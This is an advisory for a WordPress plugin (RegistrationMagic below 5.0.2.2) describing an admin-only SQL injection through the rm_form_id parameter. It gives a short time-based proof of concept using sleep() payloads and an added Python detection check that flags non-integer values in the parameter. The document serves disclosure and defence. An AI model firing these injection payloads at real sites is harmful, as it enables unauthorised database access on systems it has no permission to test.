WordPress Plugin Vulnerabilities
RegistrationMagic < 5.0.2.2 - Admin+ SQL Injection
Description
The plugin does not sanitise and escape the rm_form_id parameter before using it in a SQL statement in the Automation admin dashboard, allowing high-privilege users to perform SQL injection attacks.
Proof of Concept
As admin,
https://example.com/wp-admin/admin.php?page=rm_ex_chronos_manage_tasks&rm_form_id=sleep%285%29

POST /wp-admin/admin.php?page=rm_ex_chronos_manage_tasks HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: [admin+]
Content-Length: 19
Content-Type: application/x-www-form-urlencoded

rm_form_id=sleep(1)
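A detection-side check for the request pattern in the proof of concept above, as an added example that is not part of the original advisory or the plugin's code: it flags requests to the Automation page whose rm_form_id is not a plain integer, in either the query string or a urlencoded body. It assumes request records that include the POST body (for example from a reverse proxy or WAF audit log) and that legitimate form ids are decimal integers; the function names and sample records are constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

PAGE = "rm_ex_chronos_manage_tasks"  # admin page slug from the advisory
PARAM = "rm_form_id"                 # parameter named in the advisory


def param_values(target, body=""):
    """Return every rm_form_id value from the query string and a urlencoded body."""
    values = []
    for source in (urlsplit(target).query, body):
        # parse_qs percent-decodes once, so sleep%285%29 becomes sleep(5).
        values += parse_qs(source).get(PARAM, [])
    return values


def is_suspicious(target, body=""):
    """True when a request to the Automation page carries a non-integer rm_form_id."""
    pages = parse_qs(urlsplit(target).query).get("page", [])
    if PAGE not in pages:
        return False
    # Allowlist (assumption: legitimate form ids are plain decimal integers).
    # Anything else, including double-encoded input, fails the check.
    return any(not (v.isascii() and v.isdigit()) for v in param_values(target, body))


def flagged(records):
    """Return the indexes of the (method, target, body) records that are suspicious."""
    return [i for i, (_, target, body) in enumerate(records) if is_suspicious(target, body)]


# Constructed sample records; the first two mirror the advisory's proof of concept.
BASE = "/wp-admin/admin.php?page=" + PAGE
SAMPLES = [
    ("GET", BASE + "&rm_form_id=sleep%285%29", ""),
    ("POST", BASE, "rm_form_id=sleep(1)"),
    ("GET", BASE + "&rm_form_id=12", ""),
    ("POST", BASE, "rm_form_id=7"),
    ("GET", "/wp-admin/admin.php?page=other_page&rm_form_id=12", ""),
    ("GET", BASE + "&rm_form_id=3&rm_form_id=3%2527", ""),  # repeated, double-encoded
]

if __name__ == "__main__":
    for i in flagged(SAMPLES):
        print("suspicious:", SAMPLES[i][0], SAMPLES[i][1], SAMPLES[i][2])
```

Because the check is an allowlist on the decoded value, it does not depend on recognising any particular SQL keyword or function name.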
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)